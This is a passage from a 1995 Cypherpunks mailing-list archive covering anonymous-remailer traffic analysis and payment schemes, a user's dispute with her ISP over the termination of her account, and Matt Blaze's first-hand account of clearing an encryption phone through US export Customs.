process, read a lot of other messages.) | Excerpts from mail: 5-Jan-95 Re: Remailer Abuse wcs at anchor.ho.att.com (2028) | > Beyond that, though, are some traffic analysis problems - | > remailers require a fair bit of traffic to be useful, and unless | > you receive a reasonable amount of encrypted traffic, | > and support encrypted email for purchasing remailer service | > and other merchandise, an eavesdropper would have a fairly good source | > of traffic data on your remailer users, especially since buying and using | > remailer service requires two messages within an hour or so. | Well, I think low-volume remailers are always a bit vulnerable to | traffic analysis attacks, aren't they? One thing you could do is | build a variable time-delay into the remailer, to make it harder to | correlate messages coming in with those going out. To take paranoia a | step further, you could allow people to encrypt their mail TO an | anonymous remailer with the remailer's public key, and let the remailer | send it out unencrypted. Time delay does not guarantee mixing, which is the intent of time delay schemes. Might as well mix directly, since thats what you're trying to accomplish. Someone (I think it was Hal) wrote up a message describing the math involved. And I don't think encrypting the various parts of a remailer chain is very paranoid; I don't particularly trust the remail ops not to read my mail. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From carolann at mm.com Fri Jan 6 11:24:21 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 11:24:21 PST Subject: SysAdmin of the year In-Reply-To: <199501061846.NAA26994@bb.hks.net> Message-ID: Aren't ya glad 94's over with? He was in a big hole as 95 started. His machine was being hacked routinely. Nobody on the Web visited the site. I just like PGP. I believe it to be the nicest program anywhere. It has lots of everyday uses, even you used it. And when I crosspost a help note to .1% of Usenet, and lose 4 days of good postings, everyone loses. Till of course the story is told, for all to know. Love Always, Carol Anne Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List Coming Soon: The Internet Debut of CENSORED.COM On Fri, 6 Jan 1995 anonymous-remailer at shell.portal.com wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > > > > According to Carol Anne Braddock: > > > His name is Michael Horwath, root at winternet.com > ^^^^^^^^^^^^^^^ > > > [icicle.winternet.com] > > Login name: carolann In real life: CarolAnne Braddock > > Directory: /usr2/carolann Shell: /etc/scripts/tcsh-susp > > Last login Thu Jan 5 21:38 on ttyq5 from annex3-1.wintern > > New mail received Thu Jan 5 21:16:23 1995; > > unread since Mon Jan 2 13:18:25 1995 > > Plan: > > This account has been disabled permanently. > > > - --- > [This message has been signed by an auto-signing service. A valid signature > means only that it has been received at the address corresponding to the > signature and forwarded.] > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > Comment: Gratis auto-signing service > > iQBFAwUBLw2PxioZzwIn1bdtAQEgggF+ImxhTJlTtuMMJglmt3z/EriU0W2KisJZ > kr+JZeyf2iPyi5O/xsoHNWR/jHaYtE34 > =wNlp > -----END PGP SIGNATURE----- > From dwomack at runner.utsa.edu Fri Jan 6 11:35:16 1995 From: dwomack at runner.utsa.edu (Dave) Date: Fri, 6 Jan 95 11:35:16 PST Subject: Carol Anne - C'Punk Poster Person? Message-ID: <9501061935.AA14193@runner.utsa.edu> It occurs to me that Carol's problem may well be of considerable interest to c'punks and free speechers everywhere. Not that I favor spam or it's derivatives - but Cancelmoose and others define spam as *_50_* or more groups, esp. without crossposting. My basis for saying that Carol's situation is of interest is ---- as the net becomes more vulnerable to regulation, who among is immune to a quick cancellation of account? For something such as, say, the irresponsible (and antisocial?) advocacy of crypto? If an account can be chopped for 10 posts, where is the bottom limit? 5 perhaps? 2 maybe? 1 post that the sys-admin disagrees with? Developing the idea, and combining it with for-profit remailers...what would be wrong with a provider offering a unix shell based account, with the option of registering the account under a nym - and with finger user switchable from on to off and back again? The login ID would also be unconnected to the name. Frankly, none of this seems that radical...our friend, America On Line has some of these characteristics! Various 'anti-true spam' strategies could be used to prevent massive postings of Make Money Etc...But instead of a remailer, an actual *_system_* would be used. Payments could be by electronic invoice and money orders... Any thoughts on this? Dave From carolann at mm.com Fri Jan 6 11:43:17 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 11:43:17 PST Subject: Files and mail In-Reply-To: Message-ID: Dear Mr. Horwath, A written reply will suffice. You have my permission to make all of my files world readable. You can put them in the ftp site. Upon receipt of notice, they will be removed within 24 hours, and you will recieve a signed PGP statement with the new key, stating that the files have been removed. Other Winternet users have already gone to my defense, and copied all of the world readable material anyway. And the whole account might as well be, too. Please do not forward any mail here. You will better serve yourself bouncing the letter back to the sender and informing them of my new address. If I find forwarded mail in my mailbox, I will print hard copies and visit the Attorney General's Office and file a complaint under the Stalking laws of the State of Minnesota. And please...deactivate my WWW pages. I was astounded to find out that during the suspension, they continued to remain active, as I learned in the office Wednesday. That was (and still is) stealing my net.web.goodwill, and creating a falsehood amongst other users. My WWW Pages have found a nice, new, warm sunny home in Austin, Texas. I spent six full hours making a personal appearance, at great personal expense, to the Winternet Office to resolve the situation. My original reply still sits in suspended composition in my mailer. I wasted not a nano-second in preparing my reply to the posting. In legal point of fact, the poster is violation of Minnesota State Law. He has no legal jurisdiction whatsoever. I did not take days to "investigate", nor cite that other things such as "my machines being hacked" and "I'll do it when I'm ready to do it,". I was a simple complaint. It had no validity. Crossposting an article to .1% of the Usenet News Groups does not by the very statistic constitute spam. (And I own two shares of Hormel Corp, so I do know what SPAM (tm) is. As was pointed out in alt.current-affairs.net-abuse The complainer didn't fully read said article. It was timely.(and still is) The crossposting wasn't wasting resources. It is of no one's concern the actual groups posted. They have the right and ability to respond. I asked for no money. I did not stand to profit by the posting. The person who started the whole thing was pretty heavily chastised, by the readers of his own news group. A fast "K" was all that any individual needed for this article. No, Mr. Horwath, you are "way out-of-bounds" this time. And as the time cronology unveils itself, I am sure that will be shown to be a very truthful, factual statement. Dangerous precedents were set here. I will not rest until the whole of the Internet knows and is aware of the situation. Signed Carol Anne Braddock Friday January 6th, 1995 9:40 A.M. On Fri, 6 Jan 1995, Mike Horwath wrote: > You are welcome to your files and mail, I will pack everything up for > you as you left it, including your FTP area. > > I expect you to try to reach me today in the afternoon at my office and > I will fully explain why your account was deleted, with full detail as > to why. > > I do appreciate the work you did on the shirts for Winternet. I don't > appreciate the harassment you have already tried to bring upon me. > > When we talk, I think you might understand why this was done. If you do > not, then I feel bad, as I must then not be making myself clear. But > no matter what, this was policy that you chose to break even after I > had talked to you about it. More on this when we talk. > > Good luck at your new provider, Larry Leone is an old user of mine and > seems to be a good guy, even if a little quiet on the newsgroups :) > > A copy of this letter is also going to your new admin so that he knows > what is going on. > > Larry, Carol Anne was using about 11.5MB of disk that will be moving > over from Winternet to MM. > > Also, how have you been anyway? Been awhile since I saw you. Oh, and > could you install identd on your system? Get back to me on anything, > or with questions. > > -- > Mike Horwath IRC: Drechsau LIFE: Lover drechsau at winternet.com > Winternet: info at winternet.com root at jacobs.mn.org <- Linux! > Twin Cities area Internet Access: 612-941-9177 for more info > Founding member of Minnesota Coalition for Internet Accessibility > From flatline at u.washington.edu Fri Jan 6 11:55:22 1995 From: flatline at u.washington.edu (Christopher E Stefan) Date: Fri, 6 Jan 95 11:55:22 PST Subject: True Names In-Reply-To: Message-ID: On Thu, 5 Jan 1995, Angus Patterson wrote: > I've been trying to get True Names by Vernor Vinge, and have been told it's > out of print (like most good cypunk ), does anybody have it scanned? > I realize this is without permission, so does anybody have Vinge's address? > (e-mail or otherwise) or could anybody ask him? Btw, does he have any other > crypto/anonymity related stories? Thanks in advance. I saw a copy of _True Names_ in a local bookstore recently, so if you check around you may be able to find it. You may also want to check the used bookstores in your area. Good luck! -- Christopher E Stefan * flatline at u.washington.edu * PGP 2.6ui key by request From nelson at crynwr.com Fri Jan 6 12:08:18 1995 From: nelson at crynwr.com (Russell Nelson) Date: Fri, 6 Jan 95 12:08:18 PST Subject: Remailer Abuse In-Reply-To: Message-ID: Date: Fri, 6 Jan 1995 14:19:07 -0500 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) In a First Virtual payment-scheme remailernet, no matter how many remailers I send my message through, any _one_ operator, together with First Virtual, can burst my anon bubble. Why? Why wouldn't the FV remailers use settlements? At the end of the month, everyone settles accounts in re who gets what fraction of what. No logs are needed other than counters. -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From zoo at armadillo.com Fri Jan 6 12:38:39 1995 From: zoo at armadillo.com (david d `zoo' zuhn) Date: Fri, 6 Jan 95 12:38:39 PST Subject: Carol Anne - C'Punk Poster Person? Message-ID: <199501062040.OAA06369@monad.armadillo.com> I don't think there's much of a case for 'poster child' status involved. Users on the Winternet systems (of which I happen to be one) sign an Agreement stating that they'll abide by Netiquette whenever using internet services. Failure to do so can result in termination of service. This is Mike's way to limit the amount of time he has to spend dealing with users who generate flamage. There was [apparently] another issue involving reselling of service that I don't have details on, but which is likely to be related. Where's the censorship? I don't see it. CarolAnne is free to make whatever statements she likes (since she has service from another provider). The New York Times doesn't have to allow me to put an article on page one (much as I might wish to do so). That's not censorship either. No one is obligated to provide a soap box for someone to stand on. This is a free market issue, not free speech. Since there is competition in the local area, people are free to choose whichever provider they like. Some have more explicit AUP's than others. Some probably haven't even considered the issue. There's no one crying "Foul! Begone from the net forever". THAT would be censorship. But this is a case of "You're not following my rules. Be gone from my machine." I've got my own setup at home, mostly independent of network provider and becoming moreso as time progresses, to prevent J. Random Sysadmin from cutting me off arbitrarily. It costs more money this way, but that's not entirely unreasonable. I'd rather see a market of half a dozen or more providers in any given area, each mostly independent, providing a number of choices as to service levels and policy expectations, instead of a monolithic Micro$oft (or AOL or CI$ or Delphi or etc) "We ARE the Internet" where censorship (in the traditional definition of someone vetting any public [or private!] postings) is much more common. I could see a market for service where someone who decided to armorplate their machine could provide service to those who persist in doing "net.stupid.things". Provide anonymous accounts on that machine, and remailer accounts, and such, and then stand back and ignore all of the flamage that will come the way of root|postmaster|usenet|whatever. [ Personally, I'd likely put that domain into my global killfiles, but that's selective reading, not censorship. ] [ More disclaimers -- I don't represent Winternet in any way, nor Mike Horwath nor CarolAnne Braddock. I have no connection with Winternet except as a customer. I speak solely for myself and Armadillo Zoo Enterprises. And I'm not afraid of an electronic stalking prosecution. ] -- - david d `zoo' zuhn -| armadillo zoo software -- St. Paul, Minnesota -- zoo at armadillo.com --| unix generalist (and occasional specialist) ------------------------+ http://www.armadillo.com/ for more information pgp key upon request +---------------------------------------------------- From jrochkin at cs.oberlin.edu Fri Jan 6 12:39:26 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Fri, 6 Jan 95 12:39:26 PST Subject: Remailer Abuse Message-ID: At 3:12 PM 01/06/95, Russell Nelson wrote: > Date: Fri, 6 Jan 1995 14:19:07 -0500 > From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) > > In a First Virtual payment-scheme remailernet, no matter how many remailers > I send my message through, any _one_ operator, together with First Virtual, > can burst my anon bubble. > >Why? Why wouldn't the FV remailers use settlements? At the end of >the month, everyone settles accounts in re who gets what fraction of >what. No logs are needed other than counters. Oh, you're suggesting that I'd only actually pay the first remailer on my chain, and at the end of the month he'd pay some of the money I (and others) paid him to all of the other remailers his transacted with over the month? I hadn't thought of that, but now that I do, I can see several problems arising. 1) The initial remailer has no way of knowing how many subsequent links there are in the chain, and so doesn't know if I've paid him enough to reimburse everyone else. I can easily cheat. He also doesn't know _who_ the subsequent chains are. He can deduct one "stamp" from the amount, and forward the rest on to the next remailer, and trust them to do the same, but if I'm cheating there won't be enough to make it to the end of the chain. Both of these facts (initial op doens't know how long the chain will be, or who will be on it) are essential to the security I get from using anon remailers, so even if they could be "fixed", it would be bad to. 2) This system requies a good deal of cooperation and organization among remailer operators. They've got to agree to send each other the proper amount of money, they've got to set up policies for what the proper amount of money is, they've got to stay in relatively constant contact to keep everything running smoothly. In effect, a remailers trade association is created, and if I want to use any of the remailers in that group, I've got to use _only_ remailers in that group in my chain. I'd rather use a chain of remailers which aren't associated that closely, hopefully don't even know each other, and possibly some of which only exist for a short period of time (guerilla remailers, a risk if I'm paying, in that I can't neccesarily trust them not to steal my money, but if the money I'm paying is something like $.05 to each remailer, not a real serious risk). Assuming that there will be some free as well as some charging remailers, I'd also like to use some of each in my chain. I see some problems with the Remailer Trade Association allowing those transactions to happen. (will they accept incoming mail from a non-affilated remailer, which surely won't be paying them at the end of the month? Surely not, which means if I use any affilated remailers in my chain, no affilated remailers can come afterwords. So all affilated remailers I'm using have to come before all non-affiliated remailers, which is an undesirable restriction which could aid traffic analsysis. If there are several affiliations, things get even more complicated.) There are probably other problems too, that I haven't thought of yet. An FV-style system doesn't seem to do the trick. And it isn't an issue of certain sacrifices you have to make in order to set up for-pay remailers, as a Chaum digicash based for-pay remailer system would work admirably, and none of my objections would apply to it. From nsb at nsb.fv.com Fri Jan 6 13:15:51 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Fri, 6 Jan 95 13:15:51 PST Subject: Remailer Abuse In-Reply-To: <28351.789422888.1@nsb.fv.com> Message-ID: Excerpts from mail: 6-Jan-95 Re: Remailer Abuse nelson at crynwr.com (779) > From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) > In a First Virtual payment-scheme remailernet, no matter how many remailers > I send my message through, any _one_ operator, together with First Virtual, > can burst my anon bubble. > Why? Why wouldn't the FV remailers use settlements? At the end of > the month, everyone settles accounts in re who gets what fraction of > what. No logs are needed other than counters. I hate to say it, because I generally tend to take the pro-FV side of most arguments :-), but I think Jonathan's closer to the mark in this case. If mail goes through ten remailers, and they ALL charge via First Virtual, then the last one in the chain won't have to know who you are, but it will have to know your FV billing account. Thus it, together with FV, have enough information to break anonymity. This is NOT the same as saying that ANY one operator, together with FV, can burst anonymity; it means that the last one + FV can do so. I think, however, that you'd need to break into the last one to get enough information to allow the next-to-last one to figure out the right FV-id. (This assumes that you're tracing the message from its ultimate destination, not monitoring traffic as it passes through the remailers -- in the latter case, Jonathan is probably right on the mark.) Personally, for my taste this is sufficiently anonymous for any reasonable purpose. HOWEVER, I can imagine how to make it even more anonymous. Imagine that there are ten for-profit anonymous remailer operators who form an "anonymous remailers consortium". Each of them operates TWO remailers, a for-pay one and a free one, but the free one will only take things that have come directly via some consortium member's anonymous remailer, so your message has to be paid for once, at the entry point to the overall system. Now you can build up a chain that STARTS with a payment, but then threads its way through a bunch of less traceable systems. where the operators can't give tracing information even under court order. The consortium members would probably have to agree to some revenue sharing arrangements, but you could make this work. I think this level of engineering is overkill -- for my personal level of paranoia, I would settle for a single for-pay anonymous remailer located in a country with very different laws than those that governed the payment system. Such a system would probably be "breakable" for the legal pursuit of genuine terrorists, but not for government harassment of political dissidents, closet gays from conservative countries, pornographers, etc. I guess my basic assumption is that while any given government can not be trusted with too much power, if you can't distribute your trust for such things across several very different governments, human freedom may be a lost cause in the long run anyway. -- Nathaniel From nsb at nsb.fv.com Fri Jan 6 13:21:06 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Fri, 6 Jan 95 13:21:06 PST Subject: Remailer Abuse In-Reply-To: <1185.789426406.1@nsb.fv.com> Message-ID: <4j3PEYr0Eyt5IxI7VW@nsb.fv.com> Excerpts from mail: 6-Jan-95 Re: Remailer Abuse jrochkin at cs.oberlin.edu (3378*) > 1) The initial remailer has no way of knowing how many subsequent links > there are in the chain, and so doesn't know if I've paid him enough to > reimburse everyone else. I can easily cheat. This depends entirely on your definition of "cheating". Basically, my proposal (which I think crossed in the mail with yours, so I'm not claiming that you misunderstood it -- in fact you anticipated *most* of it, I think) was to charge once for entry to the "system", and to include in that charge as many "hops" as you feel are necessary. No cheating involved -- the truly anonymous hops would only be accessible from within the "system", i.e. from a similar anonymous remailer "inside" the system or from one of the fee-for-entry systems. If this is the charging model, then the objections about knowing the chain length, etc. all go away. > 2) This system requies a good deal of cooperation and organization among > remailer operators. Not that much, just a revenue sharing arrangement based on income and volume. Consortia do this sort of thing all the time, though most consortia aren't formed in quite the atmosphere of paranoia that often surrounds remailers..... > Assuming that there will be some free as well as some charging remailers, > I'd also like to use some of each in my chain. I see some problems with > the Remailer Trade Association allowing those transactions to happen. > (will they accept incoming mail from a non-affilated remailer, which surely > won't be paying them at the end of the month? Surely not, which means if I > use any affilated remailers in my chain, no affilated remailers can come > afterwords. So all affilated remailers I'm using have to come before all > non-affiliated remailers, which is an undesirable restriction which could > aid traffic analsysis. If there are several affiliations, things get even > more complicated.) Actually, I think this could be serialized -- you could design it so that you could use free remailers either before or after the consortium members, but once you left the consortium system your message would have to somehow pay to get back in again. That would be a mess, and not my preferred way to do it. > And it isn't an issue of > certain sacrifices you have to make in order to set up for-pay remailers, > as a Chaum digicash based for-pay remailer system would work admirably, and > none of my objections would apply to it. Yes, it is is true that if digicash starts working for real money, it will answer your objections quite nicely. However, there are lots of objections to that sort of system, too, they're just different ones. As both the FV and Digicash folks have pointed out many times, we have very different technologies that fill very different requirements, it's not an either/or choice. I think you could build interesting anonymous remailers on each system, too. -- Nathaniel From jrochkin at cs.oberlin.edu Fri Jan 6 13:30:13 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Fri, 6 Jan 95 13:30:13 PST Subject: for-pay remailers and FV (Was Re: Remailer Abuse) Message-ID: At 4:10 PM 01/06/95, Nathaniel Borenstein wrote: >I hate to say it, because I generally tend to take the pro-FV side of >most arguments :-), but I think Jonathan's closer to the mark in this >case. If mail goes through ten remailers, and they ALL charge via First >Virtual, then the last one in the chain won't have to know who you are, >but it will have to know your FV billing account. Thus it, together >with FV, have enough information to break anonymity. > >This is NOT the same as saying that ANY one operator, together with FV, >can burst anonymity; it means that the last one + FV can do so. I Hmm. Maybe I don't completely understand how this is going to work, but won't _every_ remailer in the chain need to know your FV billing account? How would the rest of them charge via FV without knowing your billing account? What Russell was suggesting (I think), was that only the first would bill via FV directly, so only the first would need to know your billing account, and then he'd settle up with the others at the end of the month. (A particular variation of that scheme is what you mentioned later in your message, and I'll get to that). But assuming that every remailer along the chain _was_ charging via FV, I fail to see how only the last one would need your billing account; seems to me they all would, and thus any one could collude with FV to violate your anonimity. [...] >Personally, for my taste this is sufficiently anonymous for any >reasonable purpose. HOWEVER, I can imagine how to make it even more >anonymous. Imagine that there are ten for-profit anonymous remailer >operators who form an "anonymous remailers consortium". Each of them >operates TWO remailers, a for-pay one and a free one, but the free one >will only take things that have come directly via some consortium >member's anonymous remailer, so your message has to be paid for once, at >the entry point to the overall system. Now you can build up a chain >that STARTS with a payment, but then threads its way through a bunch of >less traceable systems. where the operators can't give tracing >information even under court order. The consortium members would >probably have to agree to some revenue sharing arrangements, but you >could make this work. Yeah, that's a specific instance of the type of thing Russel was proposing in the message you were replying to. An instance which avoids many of the critisisms I made directly after Russell's message, but not all. The remailer operators still have to have an organization and remain in close contact, which I am uncomfortable with because it seems to make collusion more likely. And it's still dificult to intermix for-pay and free remailers within your chain, or even just for-pay remailers from several different consortiums. And there are a variety of problems in that inability. [The consortium, as far as I can tell, would also find it rather dificult to charge more for a longer chain, I can't think of any way for them to charge anything excpet a uniform amount regardless of length of chain, unless you give the first remailer a way to tell the length of your chain, which is undesirable. I'm not sure if this is a problem.] >I think this level of engineering is overkill -- for my personal level >of paranoia, I would settle for a single for-pay anonymous remailer >located in a country with very different laws than those that governed >the payment system. Such a system would probably be "breakable" for And this level of paranoia would be perfectly well surved by a Julf/penet style remailer, which _would_ work well with an FV-payment system, as I agreed before. The cypherpunks chained remailernet system as a whole is overkill for your paranoia needs, but appearantly not for the needs of those who use it over Julf's. It appears to me, that an FV-style payment scheme can't be added to the cypherpunks chained remailer system without dropping it's security to the level of Julf's. Which might be good enough for you, but not good enough for me, or presumably for anyone else that uses cypherpunks remailers. [Do you understand how cypherpunks remailers work, and the difference between them and a julf/penet style remailer? Do you understand how encryption is used in a cypherpunks-style remailer chain to make it so each individual remailer only knows the next remailer along the chain, and not the entire rest of the chain?] From carolann at mm.com Fri Jan 6 13:35:58 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 13:35:58 PST Subject: Remailer Abuse In-Reply-To: Message-ID: Yes Russell, you hit the nail on the head. It's all about trust. On Fri, 6 Jan 1995, Russell Nelson wrote: > what. No logs are needed other than counters. > > -- > -russ http://www.crynwr.com/crynwr/nelson.html > Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key > 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? > Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? > Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List Coming Soon: The Internet Debut of CENSORED.COM From jrochkin at cs.oberlin.edu Fri Jan 6 13:44:48 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Fri, 6 Jan 95 13:44:48 PST Subject: Remailer Abuse Message-ID: At 4:20 PM 01/06/95, Nathaniel Borenstein wrote: >Yes, it is is true that if digicash starts working for real money, it >will answer your objections quite nicely. However, there are lots of >objections to that sort of system, too, they're just different ones. As >both the FV and Digicash folks have pointed out many times, we have very >different technologies that fill very different requirements, it's not >an either/or choice. I think you could build interesting anonymous >remailers on each system, too. -- Nathaniel Try to bring up objections to a digicash-style system that are applicable to remailers. I agree that they are different technologies that fill different requirements, but it seems to me that the particular requirements of a remailer system are only met by a digicash/magic money style technology. I think an electronic cash system that will work with remailers, must satisfy these things: 1) You need to be able to enclose the "signifyer" of the transaction inside encryption. Whether the "signifyer" is the cash itself, or an agreement to make a transaction together with a billing number, or whatever, you need to be able to enclose it in a PGP (or other arbitrary PKE protocol) encrypted block. 2) The "signifyer" of the transaction (which again might theoretically be the cash itself, or some kind of billing number) alone shouldn't be enough to reveal the identity of the anonymous user. Number two up there is what most of us _mean_ by "anonymous digital cash", and FV simply doesn't meet it. FV might be perfectly adequate in some circumstances, but it doesn't meet that requirement, and many of us aren't going to feel comfortable using a system to pay for remailer access (among other things, certainly, but remailer access is something that is worthless without anonymity) that doesn't fulfill that requirement. If the "signifyer" alone can be used to determine who I am, even if it takes the collusion of FV and a remailer op, I'm not comfortable with that. Number One is neccesary for the ecash protocol to work within the remailer framework effectively; I've got to send each remailer it's payment within an "envelope" that no one else can penetrate. The use of an ecash payment system which doesn't meet these two requirements can't help but _lessen_ the security of the current conglomeration of remailers. Which is unacceptable to me. Remailers should be trying to approach the goal of ensured secure anonymity, and requiring payment by an ecash system which doesn't meet those two requirements would seem to be retreating from that goal, in a rather dificult to reverse manner. From blancw at microsoft.com Fri Jan 6 13:51:51 1995 From: blancw at microsoft.com (Blanc Weber) Date: Fri, 6 Jan 95 13:51:51 PST Subject: Carol Anne - C'Punk Poster Person? Message-ID: <9501062152.AA05672@netmail2.microsoft.com> From: Dave It occurs to me that Carol's problem may well be of considerable interest to c'punks and free speechers everywhere. Not that I favor spam or it's derivatives - but Cancelmoose and others define spam as *_50_* or more groups, esp. without crossposting. ........................................................... It occurs to me that Carol's problem is personal, that we don't know all of the details, that the sysadmin responsible is in contact with her and appears quite willing to communicate on the episode, to explain to her the reason for the action taken as well as being willing to provide to her opportunity to retrieve all of her email, etc. as well as to talk to her new provider and explain once again the details of the situation. If the sysadmin's action was the result of regulation, then it would be apropos for a wider range of interest, but it appears to be the decision of an individual sysadmin acting on his own prerogative. Objections could be sent to him personally, unless someone wanted to make him answer to the list for his judgement and decision, and spend a lot of time arguing with him about it. Blanc From mab at research.att.com Fri Jan 6 13:56:39 1995 From: mab at research.att.com (Matt Blaze) Date: Fri, 6 Jan 95 13:56:39 PST Subject: My life as an international arms courier Message-ID: <9501062154.AA04543@merckx.info.att.com> Under an obscure provision of US law, devices and computer programs that use encryption techniques to hide information from prying eyes and ears are considered ``munitions'' and subject to the same rules that govern the international arms trade. In particular, taking such items out of this country requires the approval of the State Department, which decides whether exporting something might endanger national security. In the past, these restrictions were of little concern to the average citizen; encryption found most of its application in military and diplomatic communications equipment. Today, however, growing concern over electronic fraud and privacy means that encryption techniques are starting to find their way into more conventional commercial products like laptop computers and portable phones. Mostly to find out what the process was like, I recently applied for a temporary export license for a portable telephone encryption product that I wanted to take with me on a business trip to England and Belgium. The item in question is more properly called a ``telephone security device.'' This is a little box that scrambles telephone conversations to protect them against eavesdroppers; this sort of protection is sometimes important when discussing confidential business matters from faraway places. The particular model I bought was already approved for export; it employs a cipher algorithm that the government has already decided is not a threat to national security even should it fall into the hands of some rogue government. This model is aimed primarily, I presume, at international business travelers who want to communicate in a reasonably secure manner with their home offices in the states. In other words, a typical user buys two of them, leaving one at the home office and carrying the other when traveling abroad. The options that came with my device included a James Bond-ish looking acoustic coupler and handset to facilitate its connection to the hardwired phones that are still common in European hotel rooms. It turns out that there was recently some discussion in the government about exempting products like my secure phone from the licensing paperwork requirements. Unfortunately, however, this exemption never actually took effect. So even though the device I had was already approved for sale abroad, I still needed to get a temporary export license before I could take it with me. But I was assured that ``this is an easy, routine process''. Well, sure enough, about two weeks before I was to leave I got back my official US State Department ``license for the temporary export of unclassified defense articles''. So far, so good. >From what I was able to figure out by reading the license (and having a few conversations with an export lawyer), I'm required to leave from an international airport with a Customs agent present (no problem there, although Customs is geared to arriving, rather than departing, travelers). At the airport, I'm supposed to fill out a form called a ``shipper's export declaration'' (SED) on which I have to declare that ``these commodities are authorized by the US government for export only to Belgium and the United Kingdom. They may not be resold, transshipped, or otherwise disposed of in any country, either in their original form or incorporated into other end-items without the prior written approval of the US Department of State''. Then I'm to present the SED and export license to a Customs official at the airport before I leave. The Customs officer is supposed to take my SED and endorse my license to show what I'm actually taking out of the country. On the way back in, I'm supposed to ``declare'' my item at Customs (even though it was manufactured in the US) and show them my license, and they're supposed to endorse the license again as proof that I have, in fact, returned the ``defense article'' to the safety of the United States. The first hitch I ran into was that no one could actually tell me where I could get an SED form. But when I called Customs they assured me that this was no big deal. ``Just come by when you get to the airport and we stamp the license. I guess you can just fill out the SED there,'' they said. I made sure to get to the airport early anyway. Although there was moderately heavy traffic near the airport, I made it to JFK two and a half hours before my 10pm flight. I was flying United, which has their own terminal at JFK, so Customs has an office right there in the same building from which I was to depart (JFK is awful to get around, so I was glad for this). I checked in for my flight (and got upgraded to first class, which bolstered my expectation that everything was going to be really easy from here on). Then, luggage, license and phone in hand, I made my way downstairs to Customs, expecting to fill out the SED form and ``just have my license stamped'' as they had assured me earlier on the telephone. I explained my situation to the security guard who controls entry to the Customs area, and he led me to ``the back office'' without much argument or delay. The head uniformed Customs guy in the back office (which I think is same office where they take the people suspected of being ``drug mules'' with cocaine-filled condoms in their stomaches) looked approachable enough. He had a sort of kindly, grandfatherly manner, and he was playing a video game on a laptop computer. I got the impression that most of the people he encounters are suspected drug smugglers, and he seemed pleased enough to be dealing with something a little different from the norm. When I explained what I was doing he looked at me as if I had just announced that I was a citizen of Mars who hadn't even bothered to obtain a visa. He explained, carefully, that a) I really do need the SED form; b) not only that, I should have already filled it out, in duplicate; c) he doesn't have blank SED forms; d) he, like everyone else in the entire US government that I had spoken to, has no idea where one gets them from, but people must get them from somewhere; and e) it doesn't really matter, because I'm in the wrong place anyway. I asked him where the right place is. ``The cargo building, of course,'' he told me, patiently. I remembered the cargo building because I passed it in the taxi just as the traffic jam began, about half an hour before I got to the United terminal. The airport shuttle bus doesn't stop there. I'd have to call a taxi. ``But I think they're closed now, and even if they were open you'd never make it before your flight'' he helpfully added, saving me the trip. He also complemented me for going to the trouble to get the license. I must have looked hurt and confused. Eventually he called in some fellow in a suit who I presume to have been his boss. ``Are you the guy who wants to export the fancy gun?'' the fellow in the suit asked me. ``It's not a gun, it's a telephone,'' I responded, with a straight face. ``Why do you have a license to export a telephone?'' Good question, I thought. I explained about the export law and showed him the thing. He agreed that it looked pretty harmless. The fellow in the suit reiterated points a through e almost verbatim (do they rehearse for these things?) and explained that this isn't really their department, since my license was issued by the State Department, not Customs, and my situation doesn't come up very often because exports usually go via the cargo building. He'd love to help me, but the computer in which these things get entered is over in Cargo. ``That's how the records get made. But you do have a valid license, which is nice.'' He also suggested that I would have had an easier time had I shipped the device instead of carrying it with me. I asked what I should do, given that my plane was scheduled to leave in less than an hour. Neither was sure, but the fellow in the suit seemed willing leave it to the discretion of the uniformed guy. ``How does this thing work, anyway?'' he asked. I explained as best as I could, trying to make it sound as harmless as it is. ``You mean like that Clipper chip?'' he asked. At this point, given that he has a computer and knows something about the Clipper chip, I figured that maybe there was some hope of making my flight. Or maybe I was about to spend the night in jail. In my mind, I put it at about a 90:10 hope:jail ratio. Then he asked, ``Do you know about this stuff?'' So we chatted about computers and cryptography for a while. Finally, the two of them decided that it wouldn't really hurt for them to just sign the form as long as I promised to call my lawyer and get the SED situation straightened out ASAP. They assured me that I won't be arrested or have any other trouble upon my return. I made my flight, validated license in hand. An aside: Throughout my trip, I discovered an interesting thing about the phone and the various options I was carrying with it. Under X-ray examination, it looks just like some kind of bomb. (I suspect it was the coiled handset cords). Every time I went through a security checkpoint, I had to dig the thing out of my luggage and show it to the guard. I almost missed the new ``Eurostar'' chunnel train (3hrs 15mins nonstop from London to Brussels, airport-style checkin and security) as the guards were trying to figure out whether my telephone was likely to explode. Coming back to the US was less eventful, though it did take me an extra hour or so to get through Customs. Expecting a bit of a hassle I didn't check any luggage and made sure to be the first person from my flight to reach the Customs line. The inspector was ready to wordlessly accept my declaration form and send me on my way when I opened my mouth and explained that I needed to get an export license stamped. That was obviously a new one for him. He finally decided that this had to be handled by something called the ``Ships Office''. I was sent to an unoccupied back room (a different back room from before) and told to wait. I thought about the recent Customs experiences of Phil Zimmermann. (Zimmermann, the author of a popular computer encryption program, was recently detained, questioned and searched by Customs officials investigating whether he violated the same regulations I was trying so hard to follow.) After about half an hour, an officer came in and asked me what I needed. I explained about my export license that had to be endorsed. She just shrugged and told me that she had to ``process the flight'' first. As best as I could tell, her job was to clear the airplane itself through Customs, that being, technically speaking, a very expensive import. It would take a little while. She was 